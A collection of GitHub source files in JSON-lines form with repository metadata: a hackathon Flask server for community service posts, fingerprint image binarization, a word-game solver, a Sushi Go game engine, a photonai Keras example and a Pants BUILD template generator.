Ugot/face_detector.py","file_name":"face_detector.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13557206096","text":"from flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\"\"\"\ndatabase\n[[name, title, description, number], ...]\n\"\"\"\nMEDICAL_STORE = []\nHOUSING_STORE = []\nFOOD_STORE = []\nTRANSPORT_STORE = []\n\n@app.route('/get_medical_info', methods=['GET'])\ndef get_medical_info():\n    return \",\".join(titles[1] for titles in MEDICAL_STORE)\n\n@app.route('/get_housing_info', methods=['GET'])\ndef get_housing_info():\n    return \",\".join(titles[1] for titles in HOUSING_STORE)\n\n@app.route('/get_food_info', methods=['GET'])\ndef get_food_info():\n    return \",\".join(titles[1] for titles in FOOD_STORE)\n\n@app.route('/get_transport_info', methods=['GET'])\ndef get_transport_info():\n    return \",\".join(titles[1] for titles in TRANSPORT_STORE)\n\n@app.route('/get_full_medical', methods=['GET'])\ndef get_full_medical():\n    position = request.args.get(\"position\")\n    print(position)\n    return \",\".join(titles for titles in MEDICAL_STORE[int(position)])\n\n@app.route('/get_full_housing', methods=['GET'])\ndef get_full_housing():\n    position = request.args.get(\"position\")\n    return \",\".join(titles for titles in HOUSING_STORE[int(position)])\n\n@app.route('/get_full_food', methods=['GET'])\ndef get_full_food():\n    position = request.args.get(\"position\")\n    return \",\".join(titles for titles 
in FOOD_STORE[int(position)])\n\n@app.route('/get_full_transport', methods=['GET'])\ndef get_full_transport():\n    position = request.args.get(\"position\")\n    return \",\".join(titles for titles in TRANSPORT_STORE[int(position)])\n\n@app.route('/save_medical_info', methods=['PUT'])\ndef save_medical_info():\n    \"\"\"\n    request body contains name, title, description and number\n    \"\"\"\n    if request.is_json:\n        data = request.get_json()\n        name = data.get('name')\n        title = data.get('title')\n        description = data.get('description')\n        number = data.get('number')\n\n        if name is None or title is None:\n            return \"Invalid input\"\n\n        MEDICAL_STORE.append([name, title, description, number])\n\n        print(MEDICAL_STORE)\n        return 'OK'\n    else:\n        return 'Invalid input'\n\n@app.route('/save_housing_info', methods=['PUT'])\ndef save_housing_info():\n    \"\"\"\n    request body contains name, title, description and number\n    \"\"\"\n    if request.is_json:\n        data = request.get_json()\n        name = data.get('name')\n        title = data.get('title')\n        description = data.get('description')\n        number = data.get('number')\n\n        if name is None or title is None:\n            return \"Invalid input\"\n\n        HOUSING_STORE.append([name, title, description, number])\n\n        print(HOUSING_STORE)\n        return 'OK'\n    else:\n        return 'Invalid input'\n\n@app.route('/save_food_info', methods=['PUT'])\ndef save_food_info():\n    \"\"\"\n    request body contains name, title, description and number\n    \"\"\"\n    if request.is_json:\n        data = request.get_json()\n        name = data.get('name')\n        title = data.get('title')\n        description = data.get('description')\n        number = data.get('number')\n\n        if name is None or title is None:\n            return \"Invalid input\"\n\n        FOOD_STORE.append([name, title, description, number])\n\n        print(FOOD_STORE)\n        return 'OK'\n    else:\n        return 'Invalid input'\n\n@app.route('/save_transport_info', methods=['PUT'])\ndef save_transport_info():\n    \"\"\"\n    request body contains name, title, description and number\n    \"\"\"\n    if request.is_json:\n        data = request.get_json()\n        name = data.get('name')\n        title = data.get('title')\n        description = data.get('description')\n        number = data.get('number')\n\n        if name is None or title is None:\n            return \"Invalid input\"\n\n        TRANSPORT_STORE.append([name, title, description, number])\n\n        print(TRANSPORT_STORE)\n        return 'OK'\n    else:\n        return 'Invalid input'\n\n@app.route('/delete_info', methods=['PUT'])\ndef delete_info():\n    \"\"\"\n    request body contains name, service and title\n    \"\"\"\n    if request.is_json:\n        data = request.get_json()\n        name = data.get('name')\n        title = data.get('title')\n        service = data.get('service')\n\n        if name is None or title is None or service is None:\n            return \"Invalid input\"\n\n        if service == \"MEDICAL\":\n            # iterate over a copy so matching posts can be removed safely mid-loop\n            for post in list(MEDICAL_STORE):\n                if post[0] == name and post[1] == title:\n                    MEDICAL_STORE.remove(post)\n            print(MEDICAL_STORE)\n        elif service == \"HOUSING\":\n            for post in list(HOUSING_STORE):\n                if post[0] == name and post[1] == title:\n                    HOUSING_STORE.remove(post)\n            print(HOUSING_STORE)\n        elif service == \"FOOD\":\n            for post in list(FOOD_STORE):\n                if post[0] == name and post[1] == title:\n                    FOOD_STORE.remove(post)\n            print(FOOD_STORE)\n        elif service == \"TRANSPORT\":\n            for post in list(TRANSPORT_STORE):\n                if post[0] == name and post[1] == title:\n                    TRANSPORT_STORE.remove(post)\n            print(TRANSPORT_STORE)\n\n        return 'OK'\n    else:\n        return 'Invalid input'\n\nif __name__ == \"__main__\":\n    
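# start the Flask development server when the module is executed directly\n    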
app.run()\n","repo_name":"yasminmahal/Hack-The-Burgh","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70924900035","text":"## Modified version by Bruno Serbena\nfrom PIL import Image\nimport numpy as np\nfrom scipy import ndimage, misc, signal\nimport scipy\nimport matplotlib.pyplot as plt\nimport matplotlib.cm\nimport cv2\nimport math\nimport sys\n\ndef binarize(img, blk_sz=3):\n\timg = img.copy()\n\t#percentileBlack = np.percentile(img, 78)\n\t#percentileWhite = np.percentile(img, 90)\n\tpercentileBlack = np.percentile(img, 78)\n\tpercentileWhite = np.percentile(img, 89)\n\tprint('percentileBlack',percentileBlack)\n\n\tprint('percentileWhite',percentileWhite)\n\n\t#print(percentileWhite)\n\n\t#hist, bins = np.histogram(img, 256, [0, 256])\n\t#plt.hist(img.ravel(), 256, [0, 256])\n\t#plt.title('Histogram for gray scale picture')\n\t#plt.show()\n\tmeans = np.zeros(img.shape)\n\n\t# number of blocks in a dimension\n\tblk_no_y, blk_no_x = (int(img.shape[0]//blk_sz), int(img.shape[1]//blk_sz))\n\tblk_mean = np.zeros((blk_no_y, blk_no_x))\n\t# for each block i,j\n\tfor i in range(blk_no_y):\n\t\tfor j in range(blk_no_x):\n\t\t\tblock = img[blk_sz*i: blk_sz*(i+1), blk_sz*j: blk_sz*(j+1)]\n\t\t\tblk_mean[i, j] = np.mean(block)\n\t\t \n\timg = np.where(img < percentileBlack, 0, img)\n\timg = np.where(img >= percentileWhite, 255, img)\n\n\t#plt.imshow(img,cmap=\"gray\")\n\t#plt.show()\n\tfor i in range(1, img.shape[0]-1):\n\t\tfor j in range(1, img.shape[1]-1):\n\t\t\tif(img[i, j] == 0 or img[i, j] == 255):\n\t\t\t\tcontinue\n\t\t\tblock = img[i-1: i+1+1, j-1: j+1+1]\n\t\t\tblock = np.ma.array(block.flatten(), mask=False)\n\t\t\tblock.mask[len(block)//2] = True\n\t\t\t#print(block.mean())\n\t\t\t \n\t\t\tif(block.mean() >= blk_mean[i//blk_sz, j//blk_sz]):\n\t\t\t\timg[i, j] = 0\n\t\t\telse:\n\t\t\t\t# img[i, j] = 255\n\t\t\t\t# better\n\t\t\t\timg[i, j] = 255\n\t#plt.imshow(img,cmap=\"gray\")\n\t#plt.show()\n\treturn img\n\n\ndef smooth_bin_filter(img, blk_sz, fil_sz, thresh):\n    img_smo = img.copy()\n    for i in range(fil_sz, img.shape[0]-fil_sz):\n        for j in range(fil_sz, img.shape[1]-fil_sz):\n            block = img[i - fil_sz: i+fil_sz+1, j-fil_sz: j+fil_sz+1]\n            #print(block.shape)\n            black_no = np.sum(block)\n            white_no = (2*fil_sz + 1)**2 - black_no  # the window holds (2*fil_sz+1)**2 pixels\n            if(black_no >= thresh):\n                img_smo[i, j] = 1\n            if(white_no >= thresh):\n                img_smo[i, j] = 0\n    return img_smo\n\ndef smooth_bin(img, blk_sz):\n    img_smo = img.copy()\n    #for fil_sz, thresh in [(3, 18),(1, 5)]:\n    img_smo = smooth_bin_filter(img, blk_sz, 2, 20) ## applying 5x5 filter\n    img_smo = smooth_bin_filter(img, blk_sz, 1, 2) ## applying 3x3 filter\n    #for fil_sz, thresh in [(3, 5),(1, 3)]:\n    #    img_smo = smooth_bin_filter(img, blk_sz, fil_sz, thresh)\n\n    return img_smo\n","repo_name":"leotakii/fingerTest","sub_path":"lib_cleaner.py","file_name":"lib_cleaner.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37626973772","text":"\r\nfrom __future__ import division, print_function, unicode_literals\r\n\r\nimport os\r\n\r\nimport data_io as io\r\nimport tiles\r\n\r\nimport board_manager\r\nimport trie_manager\r\n\r\n\r\n########################################################\r\n# Setup.\r\n# fname_game = '2012-05-08 20.36.00.png'\r\nfname_game = '2012-06-22 23.10.30.png'\r\n\r\nfname_dictionary = 
'words_zynga.txt'\r\nfname_config = 'config.yml'\r\n\r\nfolder_data = 'data'\r\nfolder_games = 'games'\r\nfolder_dictionary = 'words and letters'\r\n\r\n##########################################\r\n# Do it.\r\npath_module = os.path.dirname(os.path.abspath(__file__))\r\n\r\npath_data = os.path.join(path_module, folder_data)\r\npath_games = os.path.join(path_data, folder_games)\r\npath_dictionary = os.path.join(path_data, folder_dictionary)\r\n\r\n#\r\n# Load data.\r\n#\r\n\r\n# Read config file.\r\nf = os.path.join(path_data, fname_config)\r\ninfo_config = io.read(f)\r\n\r\n# Load dictionary into trie.\r\nf = os.path.join(path_dictionary, fname_dictionary)\r\ndaggad = trie_manager.load_daggad_dictionary(f)\r\n\r\n# Reference tiles.\r\ninfo_reference_grid, info_reference_rack = tiles.load_reference_tiles()\r\n\r\n# Load game image.\r\nf = os.path.join(path_games, fname_game)\r\nimg_game, meta = io.read(f)\r\n\r\n# Parse game image to game letters.\r\nletters_game, letters_rack = tiles.parse_game_letters(img_game,\r\n info_reference_grid,\r\n info_reference_rack,\r\n info_config)\r\n# Build game board.\r\nboard = board_manager.Board()\r\nboard.set_game_letters(letters_game)\r\n\r\nprint(board)\r\n\r\nprint(letters_rack)\r\n\r\n#\r\n# Cross check.\r\n#\r\nfor i, j in board.anchors:\r\n\r\n ij_pre, letters_pre = board.contiguous_vertical( (i, j-1) )\r\n ij_post, letters_post = board.contiguous_vertical( (i, j+1) )\r\n\r\n board.playables[i, j] = ''\r\n\r\n # Loop over rack letters, establish wich are playable.\r\n for L in letters_rack:\r\n word_test = letters_pre + L + letters_post\r\n if daggad.search(word_test):\r\n board.playables[i, j] += L\r\n\r\n\r\n\r\n\r\n#\r\n# Work with a single line.\r\n#\r\nj = 15\r\nline, playable = board.get_line(j)\r\nprint(line)\r\nprint(playable)\r\n\r\n# Pretty print.\r\ntemplate = '%1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s'\r\nprint()\r\n\r\nval = [v for v in playable]\r\nfor k in range(7):\r\n line = [v[:1] for v in val]\r\n print(template % tuple(line))\r\n val = [v[1:] for v in val]\r\n\r\n","repo_name":"Who8MyLunch/Eat_Words","sub_path":"eat_words/game_manager.py","file_name":"game_manager.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36837278481","text":"from sushigo.deck import StandardDeck\nfrom itertools import islice\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport uuid\nimport pprint\n\npp = pprint.PrettyPrinter(indent=2)\n\n\nclass Game(object):\n def __init__(self, agents, deck=None, cards_per_player=10, n_rounds=3, verbose=False):\n if len(set([_.name for _ in agents])) != len(agents):\n raise ValueError(\"two players in game have the same name\")\n self.turn = 1\n self.round = 1\n self.verbose = verbose\n self.max_rounds = n_rounds\n self.cards_per_player = cards_per_player\n self.deck = deck if deck else StandardDeck()\n if self.cards_per_player * len(agents) * n_rounds > self.deck.cards_left:\n raise ValueError('Deck has not enough cards.')\n self.score = self.deck.scoring_function()\n self.players = {_.name: _ for _ in agents}\n self.game_id = str(uuid.uuid4())[:6]\n self.gamelog = pd.DataFrame({\n \"game_id\": self.game_id,\n \"round\": 0,\n \"turn\": 0,\n \"player\": list(self.players.keys()),\n \"action\": '',\n \"reward\": 0,\n \"round_reward\": 0\n })\n self.scores = {\"round-{}\".format(i): {_.name: 0.0 for _ in agents} for i in range(0, n_rounds + 1)}\n for name in 
self.players.keys():\n self.players[name].hand = list(islice(self.deck, self.cards_per_player))\n\n def log_user_action(self, player_name, action):\n \"\"\"\n This method appends to the log dataframe found in self.gamelog \n :param player_name: player object, not player-name \n :param action: action, card type string \n \"\"\"\n log = pd.DataFrame({\n 'game_id': [self.game_id],\n 'round': self.round,\n 'turn': self.turn,\n 'player': player_name,\n 'action': action,\n 'reward': self.calc_points(player_name),\n 'round_reward': self.calc_scores()[player_name]\n })\n df = pd.concat([self.gamelog, log], ignore_index=True).sort_values(['player', 'turn'])\n self.gamelog = df\n\n def play_turn(self):\n \"\"\"\n This method simulates a single turn in a game.\n \"\"\"\n chosen_cards = {}\n for player_name in self.players.keys():\n observation = self.get_observation(player_name)\n action_space = self.get_action_space(player_name)\n last_log_player = self.gamelog[self.gamelog['player'] == player_name].iloc[-1]\n reward = last_log_player['reward']\n player = self.players[player_name]\n\n # the player selects a type of card\n chosen_card = player.act(reward=reward,\n observation=observation,\n action_space=action_space)\n chosen_cards[player_name] = chosen_card\n\n # next we determine the new player_state\n player.table.append(chosen_card)\n player.hand = [card for card in player.hand if card is not chosen_card]\n for player_name, chosen_card in chosen_cards.items():\n self.log_user_action(player_name=player_name, action=chosen_card)\n\n # last thing we need to do is ensure that everybody switches hand\n current_hands = [p.hand for p in self.players.values()]\n for i, name in enumerate(self.players.keys()):\n self.players[name].hand = current_hands[i - 1]\n\n # if this is the last turn of the round we want to remove the table\n if self.turn % self.cards_per_player == 0:\n self.calc_scores()\n self.reset_table()\n # the very last thing is to update the turn\n self.turn += 1\n\n if self.verbose:\n info = {}\n info['game'] = self.game_id\n info['round'] = self.round\n info['turn'] = self.turn\n info['table'] = {_: [c.type for c in self.players[_].table] for _ in self.players.keys()}\n info['points'] = {_: self.calc_points(_) for _ in self.players.keys()}\n pprint.pprint(info, width=2)\n\n def reset_table(self):\n \"\"\"Clears the table. Persistent cards remain.\"\"\"\n for player in self.players.values():\n player.table = [card for card in player.table if card.persistent]\n\n def reset_game(self):\n self.turn = 0\n self.round = 1\n self.game_id = str(uuid.uuid4())[:6]\n self.deck.reset()\n for player in self.players.values():\n player.table = []\n self.scores = {\"round-{}\".format(i): {_: 0. 
for _ in self.players.keys()} for i in range(1, self.max_rounds + 1)}\n for name in self.players.keys():\n self.players[name].hand = list(islice(self.deck, self.cards_per_player))\n\n def play_round(self):\n for turn in range(self.cards_per_player):\n self.play_turn()\n # if all games haven't been played yet, draw cards again\n if self.round < self.max_rounds:\n self.scores[\"round-{}\".format(self.round)] = self.calc_scores()\n self.round += 1\n for name in self.players.keys():\n self.players[name].hand = list(islice(self.deck, self.cards_per_player))\n\n def simulate_game(self):\n \"\"\"\n This method simulates a single game and resets it.\n :return:\n \"\"\"\n for round in range(self.max_rounds):\n self.play_round()\n self.reset_game()\n return self.gamelog\n\n def end_results(self):\n output = {}\n this_game_log = self.gamelog[self.gamelog['game_id'] == self.game_id]\n this_game_log = this_game_log[this_game_log['turn'] == this_game_log['turn'].max()]\n for player in self.players:\n player_log = this_game_log[this_game_log['player'] == player]\n output[player] = player_log['reward'].iloc[-1]\n return output\n\n def get_action_space(self, player_name):\n return self.players[player_name].hand\n\n def get_observation(self, player_name):\n return {\n \"table\": {_: self.players[_].table for _ in self.players.keys()},\n \"hand\": [repr(_) for _ in self.players[player_name].hand],\n \"scores\": self.scores\n }\n\n @property\n def is_end_of_round(self):\n return self.turn % self.cards_per_player == 0\n\n @property\n def is_end_of_game(self):\n return self.round == self.max_rounds and self.is_end_of_round\n\n def calc_points(self, player_name):\n \"\"\"\n This method calculates the direct points of a player at the\n time of the method call.\n :return: float\n \"\"\"\n df = self.gamelog\n df = df[df[\"player\"] == player_name]\n df = df[df[\"round\"] == self.round - 1]\n prev_round_score = df[\"reward\"].max()\n return self.calc_scores()[player_name] + prev_round_score\n\n def did_player_win(self, player_name):\n \"\"\"\n :param player_name (str): name of the player in the game\n :return (bool): True or False\n \"\"\"\n df = self.gamelog\n df = df[df['turn'] == self.max_rounds * self.cards_per_player]\n return df['reward'].max() == df[df['player'] == player_name]['reward'].iloc[0]\n\n def calc_scores(self):\n \"\"\"\n This method calculates the score of all players.\n This method should only be called at the last turn end of a round.\n :return: dict with player-name: scores for current round.\n \"\"\"\n score_dict = self.score(\n player_cards={player_name: player.table for player_name, player in self.players.items()},\n end_round=self.is_end_of_round, end_game=self.is_end_of_game\n )\n for player_name, score in score_dict.items():\n self.scores[\"round-{}\".format(self.round)][player_name] = float(score)\n return score_dict\n\n def count_cards(self, player_name, cardtype):\n return len([_ for _ in self.players[player_name].table if _.type == cardtype])","repo_name":"koaning/sushigo","sub_path":"sushigo/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"39474753533","text":"from sklearn.datasets import load_diabetes\nfrom sklearn.model_selection import KFold\n\nfrom photonai import Hyperpipe, PipelineElement, Categorical\n\nX, y = load_diabetes(return_X_y=True)\n\n\n# DESIGN YOUR PIPELINE\nmy_pipe = Hyperpipe('basic_keras_regression_pipe',\n 
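# grid search exhaustively evaluates every hyperparameter combination defined below\n                    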
optimizer='grid_search',\n optimizer_params={},\n metrics=['mean_squared_error'],\n best_config_metric='mean_squared_error',\n outer_cv=KFold(n_splits=2),\n inner_cv=KFold(n_splits=2),\n verbosity=1,\n project_folder='./tmp/')\n\n\n# ADD ELEMENTS TO YOUR PIPELINE\nmy_pipe.add(PipelineElement('StandardScaler'))\n\n# attention: shape of hidden_layer_sizes == shape of activations. If you want to choose a function in every layer,\n# grid_search eliminates combinations with len(hidden_layer_size) != len(activations).\n# Check out: hidden_layer_sizes=[25, 10], activations=['tanh', 'relu']\n\n# USE KERASDNNCLASSIFIER FOR CLASSIFICATION\nmy_pipe += PipelineElement('KerasDnnRegressor',\n hyperparameters={'hidden_layer_sizes': Categorical([[18, 14], [30, 5]]),\n 'dropout_rate': Categorical([0.01, 0.2])},\n activations='relu',\n epochs=50,\n nn_batch_size=64,\n verbosity=0)\n\n# NOW TRAIN YOUR PIPELINE\nmy_pipe.fit(X, y)\n","repo_name":"wwu-mmll/photonai","sub_path":"examples/neural_networks/keras_dnn_regression.py","file_name":"keras_dnn_regression.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"61"} +{"seq_id":"40233379398","text":"import re\nfrom collections import defaultdict\nfrom textwrap import dedent\n\nfrom generation_utils import GenerationUtils\n\nclass Target(object):\n \"\"\"Class to organize target template instances for generated BUILD files.\n\n To add a new target, created it as a class variable (see existing templates below), then add it to\n the list in get_template at the bottom so that it can be properly discovered.\n \"\"\"\n\n class NoSuchTargetError(Exception):\n def __init__(self, name):\n super(Target.NoSuchTargetError, self).__init__(\n 'Target \"{name}\" does not exist.'.format(name=name))\n\n class NoSuchValueType(Exception):\n pass\n\n class MissingTemplateArgumentError(Exception):\n pass\n\n class Template(object):\n\n def __init__(self, name, params, template, blank_lines=True):\n \"\"\"Creates a new target template, which can be used to generate code for targets in BUILD\n files using the format() method.\n\n :param name: The target type (eg, 'java_library')\n :param params: The list of parameters which can be injected into this template, optionally\n with an associated type declared by following with :type. Eg, 'sources:list' would create a\n parameter with the name 'sources' and the type 'list'. Understood types currently include\n 'raw', 'string', and 'list'. These types affect how the parameters are ultimately formatted\n when data is injected into this template. When the type is unspecified, it defaults to the\n values defined in DEFAULT_TYPES, or 'raw' if not present.\n\n Parameters also have a notion of extra flags, which basically act like type modifiers.\n These are specified in the following format: param_name:type:flags1:flag2:more_flags.\n\n Supported flags include:\n collapsible - when applied to a list, the list will be made a one-liner if it only has one\n argument.\n optional - if not specified (or specified as None), the argument will be entirely removed\n from the formatted output. 
This is done by splitting the output at the ',' character,\n and removing and entry which has optional parameters that are None, then joining it\n back together before returning the formatted result.\n sorted - when applied to a list, the list will be sorted() before formatting.\n emptyable - will format as the empty string rather than {} or [] for empty lists and\n dicts.\n :param template: The code for the actual template string, with parameter names specified in\n the same style used for str.format, eg 'Hello {person_name}.'. The parameters included in\n the template code must exactly match those defined in params, or an error will be raised\n when format() is invoked.\n :param blank_lines: Whether to pad the formatted output string with blank lines.\n \"\"\"\n self.name = name\n self.template = template\n self.blank_lines = blank_lines\n\n DEFAULT_TYPES = {\n 'name':'string',\n 'sources':'list',\n 'resources':'list',\n 'dependencies':'list',\n 'imports':'list',\n 'platform':'string',\n }\n\n self.flags = defaultdict(set)\n self.flags.update({\n 'sources': {'collapsible'},\n 'platform':'optional',\n })\n\n self.params = {}\n for param in params:\n if ':' in param:\n parts = param.split(':')\n name, kind = parts[:2]\n self.params[name] = kind\n flags = set(parts[2:])\n self.flags[name] = flags\n elif param in DEFAULT_TYPES:\n self.params[param] = DEFAULT_TYPES[param]\n else:\n self.params[param] = 'raw'\n\n def _indent_text(self, text, indent=2):\n lines = str(text).split('\\n')\n lines = ['{0}{1}'.format(' '*indent, line).rstrip() for line in lines]\n return '\\n'.join(lines)\n\n def _format_item(self, item):\n string_pattern = re.compile(r\"^(?P'?)(?P.*?)(?P=quote)(?P,?)$\")\n object_pattern = re.compile(r'^(?P[a-zA-Z_$0-9]+[(].*?[)].*?)(,?)$',\n re.DOTALL | re.MULTILINE)\n original = item\n item = item.strip()\n match = re.match(object_pattern, item)\n if match:\n # Handle things like jar() objects.\n return match.group('content')\n match = re.match(string_pattern, item)\n if not match:\n print(' Warning: Unrecognized item format, assuming raw object: {}.'.format(item))\n return original\n return \"'{}'\".format(match.group('content'))\n\n def _format_dict(self, param, data):\n if not data:\n return '{}'\n items = [\n (self._format_item(key), self._format_item(value)) for (key, value) in data.items()\n ]\n if 'sorted' in self.flags[param]:\n items = sorted(items)\n return '{{{}\\n }}'.format(''.join('\\n {}: {},'.format(key, val) for (key, val) in items))\n\n def _format_list(self, param, items):\n if not items:\n return '[]'\n items = [self._format_item(item) for item in items if item]\n if len(items) == 1 and 'collapsible' in self.flags[param]:\n return '[{}]'.format(items[0])\n if 'sorted' in self.flags[param]:\n items = sorted(items)\n\n return '[{}\\n ]'.format(','.join('\\n{}'.format(self._indent_text(item, indent=4))\n for item in items))\n\n def _extract(self, param, args):\n value = args.get(param) or ''\n kind = self.params[param]\n if kind == 'raw':\n return value\n # Value that can be matched properly by regexes.\n re_value = str(value).replace('\\n', ' ')\n if kind == 'string':\n if not value:\n return \"''\"\n if re.match(r'^\\s*([\"{quote}]).*?[^\\\\]\\1\\s*$'.format(quote=\"'\"), re_value):\n return value\n return \"'{0}'\".format(value)\n if 'emptyable' in self.flags[param] and not value:\n return ''\n if kind == 'list':\n if not value:\n return '[]'\n if isinstance(value, str):\n if '(' in value:\n return value # Hack for globs() and jar().\n value = [value,]\n 
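# delegate rendering of the collected items to the list formatter\n      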
return self._format_list(param, value)\n if kind == 'dict':\n if not value:\n return '{}'\n if hasattr(value, '__getitem__') and hasattr(value, 'items'):\n return self._format_dict(param, value)\n if isinstance(value, str):\n return value\n raise ValueError('Illegally formatted dict argument: {} = {}.'.format(param, value))\n\n raise Target.NoSuchValueType('No such value type \"{kind}\".'.format(kind=kind))\n\n def _is_optional(self, param):\n return 'optional' in self.flags[param]\n\n def _strip_optional(self, **kwargs):\n parts = self.template.split(',')\n for param in self.params:\n if self._is_optional(param):\n if param not in kwargs or kwargs[param] is None:\n parts = [part for part in parts if '{%s}'%param not in part]\n elif param not in kwargs:\n completed = kwargs\n completed.update({ p: 'MISSING VALUE!' for p in self.params if p not in kwargs })\n args_text = self.format(skip_missing_check=True, **completed)\n raise Target.MissingTemplateArgumentError('Missing argument \"{}\" for {}().\\n{}'\n .format(param, self.name, args_text))\n return ','.join(parts)\n\n def format(self, symbols=None, file_name=None, skip_missing_check=False, **kwargs):\n \"\"\"Behaves somewhat like str.format, creating a 'concrete' by injecting relevant parameters\n into this template.\n\n Parameters which were not specified when this template was initialized are ignored.\n Unspecified parameters will default to reasonable values based on their types (eg, [] or '').\n The parameters are formatted according to their type (specified as 'name:type', defaulting to\n their value in DEFAULT_TYPES or 'raw').\n\n This means parameters which are lists should be passed in as actual list objects, not as\n strings. If a string is passed in, it will be inserted literally, which is useful for\n specifying things like \"globs('*.java')\" rather than an explicit list of sources.\n\n Parameters which are strings will be automatically wrapped in single-quotes if they aren't\n already (eg, '\"hello\"' will become \"hello\" in the output file, and 'hello' will become\n 'hello'). 
Raw parameters will be inserted literally, so the string 'hello' will just become\n hello in the output.\n\n Example usage: Target.jar_library.format(name='lib', jars=[\"'3rdparty:fake-library'\",],)\n\n :param dict symbols: If present, replaces all instances of ${key} with symbols[key]\n in the formatted output string.\n :param string file_name: Optional string used to format error messages if something goes\n wrong.\n :param skip_missing_check: If true, will skip the normal check for missing arguments.\n :returns: a string containing the target, which can be inserted directly into a BUILD file.\n \"\"\"\n if symbols:\n\n def substitute(value):\n return GenerationUtils.symbol_substitution(symbols, value, symbols_name=file_name)\n\n for key, value in list(kwargs.items()):\n if not value:\n continue\n if any(isinstance(value, t) for t in (list,set,tuple,)):\n kwargs[key] = [substitute(v) for v in value]\n elif hasattr(value, '__getitem__') and hasattr(value, 'items'):\n kwargs[key] = { k: substitute(v) for k,v in value.items() }\n else:\n kwargs[key] = substitute(value)\n relevant = {}\n for param in self.params.keys():\n relevant[param] = self._extract(param, kwargs)\n template = self._strip_optional(**kwargs) if not skip_missing_check else self.template\n text = template.format(**relevant)\n if not self.blank_lines:\n return text\n return '\\n{0}\\n'.format(text)\n\n _ALL_TEMPLATES = {}\n @classmethod\n def create_template(cls, *args, **kwargs):\n template = cls.Template(*args, **kwargs)\n cls._ALL_TEMPLATES[template.name] = template\n return template\n\n @classmethod\n def get_template(cls, name):\n if name in cls._ALL_TEMPLATES:\n return cls._ALL_TEMPLATES[name]\n raise Target.NoSuchTargetError(name)\n\n @classmethod\n def reset(cls):\n \"\"\"Clear out existing templates.\n\n Intended for testing.\n \"\"\"\n cls._ALL_TEMPLATES = {}\n\n\nTarget.annotation_processor = Target.create_template('annotation_processor',\n ['name', 'sources', 'resources', 'dependencies', 'platform',],\n'''annotation_processor(name={name},\n sources = {sources},\n resources = {resources},\n dependencies = {dependencies},\n platform = {platform},\n)''')\n\nTarget.dependencies = Target.create_template('dependencies', ['name', 'dependencies',],\n'''target(name={name},\n dependencies = {dependencies},\n)''')\n\nTarget.fingerprint = Target.create_template('fingerprint', ['name', 'sources', 'dependencies'],\ndedent('''\n # This target's sole purpose is just to invalidate the cache if loose files (eg app-manifest.yaml)\n # for the jvm_binary change.\n fingerprint(name={name},\n sources = {sources},\n dependencies = {dependencies},\n )\n''').strip())\n\nTarget.placeholder = Target.create_template('placeholder', ['name',],\n'''target(name={name})\n''')\n\nTarget.jar_library = Target.create_template('jar_library', ['name', 'jars:list:sorted',],\n'''jar_library(name={name},\n jars = {jars},\n)''')\n\nTarget.java_library = Target.create_template('java_library', ['name', 'sources', 'resources',\n 'dependencies',\n 'groupId', 'artifactId',\n 'platform',],\n'''java_library(name={name},\n sources = {sources},\n resources = {resources},\n dependencies = {dependencies},\n platform = {platform},\n provides = artifact(org='{groupId}',\n name='{artifactId}',\n repo=square,), # see squarepants/plugin/repo/register.py\n)''')\n\nTarget.java_protobuf_library = Target.create_template('java_protobuf_library',\n ['name', 'sources', 'dependencies', 'imports', 'platform', 'groupId', 'artifactId'],\n'''java_protobuf_library(name={name},\n 
sources = {sources},\n imports = {imports},\n dependencies = {dependencies},\n platform = {platform},\n provides = artifact(org='{groupId}',\n name='{artifactId}',\n repo=square,), # see squarepants/plugin/repo/register.py\n)''')\n\nTarget.java_wire_library = Target.create_template('java_wire_library',\n ['name', 'sources', 'dependencies', 'roots:list', 'service_factory:string',\n 'enum_options:list:optional', 'registry_class:string', 'no_options:raw:optional',\n 'platform'],\n'''java_wire_library(name={name},\n sources = {sources},\n dependencies = {dependencies},\n roots = {roots},\n service_factory = {service_factory},\n enum_options = {enum_options},\n no_options = {no_options},\n registry_class = {registry_class},\n platform = {platform},\n)''')\n\nTarget.jvm_prep_command = Target.create_template('jvm_prep_command',\n ['name', 'mainclass:string', 'goal:string:optional', 'args:list:optional',\n 'jvm_options:list:optional', 'dependencies:list'], dedent('''\n jvm_prep_command(name={name},\n goal={goal},\n mainclass={mainclass},\n args={args},\n jvm_options={jvm_options},\n dependencies={dependencies},\n )\n '''))\n\nTarget.junit_tests = Target.create_template('junit_tests',\n ['name', 'sources', 'cwd:string', 'dependencies', 'platform', 'tags:list:optional',\n 'extra_env_vars:dict:optional', 'extra_jvm_options:list:optional'],\n'''junit_tests(name={name},\n # TODO: Ideally, sources between :test, :integration-tests and :lib should not intersect\n sources = {sources},\n cwd = {cwd},\n tags = {tags},\n dependencies = {dependencies},\n platform = {platform},\n extra_env_vars = {extra_env_vars},\n extra_jvm_options = {extra_jvm_options},\n)''')\n\n\nTarget.jvm_binary = Target.create_template('jvm_binary',\n ['name', 'main:string', 'basename:string', 'dependencies', 'manifest_entries:dict:emptyable',\n 'deploy_excludes:list:optional', 'platform', 'shading_rules:list:optional'],\n'''jvm_binary(name={name},\n main = {main},\n basename= {basename},\n dependencies = {dependencies},\n manifest_entries = square_manifest({manifest_entries}),\n deploy_excludes = {deploy_excludes},\n platform = {platform},\n shading_rules = {shading_rules},\n)''')\n\nTarget.resources = Target.create_template('resources',\n ['name', 'sources', 'dependencies:list:optional'],\n'''resources(name={name},\n sources = {sources},\n dependencies = {dependencies},\n)''')\n\nTarget.signed_jars = Target.create_template('signed_jars',\n ['name', 'dependencies', 